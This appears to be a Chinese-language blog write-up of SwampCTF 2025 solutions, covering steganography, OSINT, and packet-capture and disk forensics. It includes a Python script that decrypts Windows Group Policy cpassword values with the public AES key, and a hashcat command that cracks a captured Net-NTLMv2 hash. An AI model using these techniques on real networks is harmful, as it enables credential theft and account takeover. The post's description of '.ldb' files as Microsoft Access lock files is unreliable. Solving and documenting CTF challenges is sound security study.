SwampCTF 2025

比赛地址:SwampCTF 2025

比赛时间:29 Mar 2025 05:00 CST - 31 Mar 2025 05:00 CST

复现的题目用🔁标注

Misc

Pretty Picture: Double Exposure

Challenge

Pretty Picture: Double Exposure

Hidden in the bits below, an image wait’s to be shown.

double-exposure

Solution

SwampCTF2025-1

用 StegSolve 打开翻几下就看到了

1
swampCTF{m3ss4g3s_0r_c0de_c4n_b3_h1dd3n_1n_1m4g3s}

OSINT

Party Time!

Challenge

Party Time!

By: lyngo

This party house is known for its 3AM outings, but you’ve gotta work for the location if you want to come! Enter the GPS coordinates of the location!

Example: swampCTF{xx.xx.xx,xx.xx.xx}, swampCTF

附件【IMG_4048.HEIC】下载

Solution

SwampCTF2025-2

在属性这里就能看到经纬度

1
swampCTF{29.39.10,82.19.59}

Party Time! Level 2

Challenge

Party Time! Level 2

The party just ended, but people are hungry. Find the nearest fast food spot to see where everyone went!

The flag format is swampCTF{…}. You will not need to wrap it yourself.

查看提示

The reviews love the racecar fast service.

Solution

先是找到了这个地方的实际位置蓋恩斯維爾,佛羅里達 - Google 地圖

SwampCTF2025-3

然后搜索附近的快餐店

SwampCTF2025-4

于是找到了这条评论

1
swampCTF{Checkers_Yum}

Forensics

Preferential Treatment

Challenge

Preferential Treatment

We have an old Windows Server 2008 instance that we lost the password for. Can you see if you can find one in this packet capture?

gpnightmare.pcap

Solution

搜索 CTF 找到了这条流量

SwampCTF2025-5

追踪流发现这段 XML 数据

SwampCTF2025-6

1
2
3
4
5
6
7
8
9
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EC16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-52E5-4d24-8B1A-D9BDE98BA1D1}" name="swampctf.com\Administrator" image="2"
          changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
        <Properties action="U" newName="" fullName="" description=""
                    cpassword="dAw7VQvfj9rs53A8t4PudTVf85Ca5cmC1Xjx6TpI/cS8WD4D8DXbKiWIZslihdJw3Rf+ijboX7FgLW7pF0K6x7dfhQ8gxLq34ENGjN8eTOI="
                    changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="swampctf.com\Administrator"/>
    </User>
</Groups>

经过搜索得知在 Windows Server 2008 及更早版本中,微软引入了组策略首选项(Group Policy Preferences, GPP)功能,允许管理员通过组策略来配置用户账户和密码。为了存储这些密码,微软选择使用 AES 加密算法对密码进行加密,并将加密后的结果存储为 cpassword 字段。然而微软使用了一个 静态的、硬编码的 AES 密钥 来加密所有 cpassword 字段,这个密钥是公开的,任何知道该密钥的人都可以解密 cpassword

以下是公开的 AES 密钥(以十六进制表示):

1
4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b

exp 如下

1
2
3
4
5
6
7
8
9
10
11
12
13
import base64
from Crypto.Cipher import AES

AES_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

def decrypt_cpassword(cpassword):
    encrypted_password = base64.b64decode(cpassword)
    cipher = AES.new(AES_KEY, AES.MODE_CBC, IV=b"\x00" * 16)
    decrypted_password = cipher.decrypt(encrypted_password)
    return decrypted_password[:-decrypted_password[-1]].decode()

cpassword = "dAw7VQvfj9rs53A8t4PudTVf85Ca5cmC1Xjx6TpI/cS8WD4D8DXbKiWIZslihdJw3Rf+ijboX7FgLW7pF0K6x7dfhQ8gxLq34ENGjN8eTOI="
print(decrypt_cpassword(cpassword))

运行得到 flag

1
swampCTF{4v3r463_w1nd0w5_53cur17y}

🔁MuddyWater

Challenge

MuddyWater

We caught a threat actor, called MuddyWater, bruteforcing a login for our Domain Controller. We have a packet capture of the intrustion. Can you figure out which account they logged in to and what the password is?

Flag format is swampCTF{<username>:<password>}

muddywater.pcap

Solution

SwampCTF2025-7

分析发现 SMB2 的分组数占比最高

题目问登录了哪个账号那就说明登录成功了,那么现在就筛选出登录成功的数据包

smb2.cmd == 0x01 限定为 SMB2_NEGOTIATE 命令,这是是客户端和服务器之间的第一个交互步骤,用于确认协议协商是否成功

根据 SMB2 协议规范,nt_status 字段等于 0x00000000 表示 STATUS_SUCCESS,即操作成功完成

因此构造出下面这个过滤条件

1
smb2.nt_status == 0x00000000 && smb2.cmd == 0x01

SwampCTF2025-8

筛选得到这一条流量

然后追踪流,把这 28 个分组导出到一个新的流量包并上传到 apackets(一个用于提取 NTLMv2 哈希的在线工具)

SwampCTF2025-9

Net-NTLMv2 格式为 <username>::<domain>:<server_challenge>:<NTLMv2_response>:<blob>:<password>

得到了 Net-NTLMv2 哈希值

1
hackbackzip::DESKTOP-0TNOE4V:D102444D56E078F4:EB1B0AFC1EEF819C1DCCD514C9623201:01010000000000006F233D3D9F9EDB01755959535466696D0000000002001E004400450053004B0054004F0050002D00300054004E004F0045003400560001001E004400450053004B0054004F0050002D00300054004E004F0045003400560004001E004400450053004B0054004F0050002D00300054004E004F0045003400560003001E004400450053004B0054004F0050002D00300054004E004F00450034005600070008006F233D3D9F9EDB010900280063006900660073002F004400450053004B0054004F0050002D00300054004E004F004500340056000000000000000000

把它存到 hash.txt 下,用 hashcat 破解,字典用的是 rockyou.txt

1
hashcat -m 5600 hash.txt ./wordlists/rockyou.txt

SwampCTF2025-10

因此账号是 hackbackzip ,密码是 pikeplace

1
swampCTF{hackbackzip:pikeplace}

🔁Planetary Storage

Challenge

Planetary Storage

My friend found this strange file while perusing his computer, but we can’t read it. Can you figure out what it is and get the information from it?

Difficulty: Easy/Medium

The flag is in the standard format.

PlanetaryStorage.zip

Solution

.ldb 文件是由 Microsoft Access 在多用户环境下自动生成的锁定文件,存储在与 .mdb.accdb 数据库文件相同的目录中,用于记录当前访问数据库的用户信息及其锁定状态,以协调并发访问并防止数据冲突。

逐个检查这三个 .ldb 文件的内容,最终在 000010.ldb 的 payload 中发现了 flag

SwampCTF2025-11

SwampCTF2025-12

1
swampCTF{1pf5-b453d-d474b453}

🔁Homework Help

Challenge

Homework Help

I accidently lost some of my class notes! Can you help me recover it? (Note: Unzipped size is 4GB)

SWAMP_D_image.zip

Solution

SwampCTF2025-13

下载下来的磁盘镜像用 FTK 打开,然后在 Hacking 文件夹下发现了这个被删除的 .docx 文档

恢复文档就可以看到 flag 了

SwampCTF2025-14

1
swampCTF{n0thing_i5_3v3r_d3l3t3d}